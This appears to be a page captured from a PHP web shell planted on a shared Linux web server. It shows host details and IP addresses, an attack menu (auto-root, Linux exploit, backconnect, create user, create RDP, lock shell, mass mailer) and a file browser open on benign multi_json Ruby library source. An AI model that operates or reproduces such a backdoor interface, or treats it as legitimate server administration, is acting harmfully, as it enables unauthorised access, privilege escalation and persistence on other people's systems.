Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
multi_json /
[ HOME SHELL ]
Name
Size
Permission
Action
adapters
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
adapter.rb
1.21
KB
-rw-r--r--
adapter_error.rb
417
B
-rw-r--r--
convertible_hash_keys.rb
992
B
-rw-r--r--
options.rb
876
B
-rw-r--r--
options_cache.rb
761
B
-rw-r--r--
parse_error.rb
431
B
-rw-r--r--
version.rb
429
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : adapter.rb
require 'singleton' require 'multi_json/options' module MultiJson class Adapter extend Options include Singleton class << self def defaults(action, value) metaclass = class << self; self; end metaclass.instance_eval do define_method("default_#{action}_options") { value } end end def load(string, options = {}) string = string.read if string.respond_to?(:read) fail self::ParseError if blank?(string) instance.load(string, cached_load_options(options)) end def dump(object, options = {}) instance.dump(object, cached_dump_options(options)) end private def blank?(input) input.nil? || /\A\s*\z/ === input rescue ArgumentError # invalid byte sequence in UTF-8 false end def cached_dump_options(options) OptionsCache.fetch(:dump, options) do dump_options(options).merge(MultiJson.dump_options(options)).merge!(options) end end def cached_load_options(options) OptionsCache.fetch(:load, options) do load_options(options).merge(MultiJson.load_options(options)).merge!(options) end end end end end
Close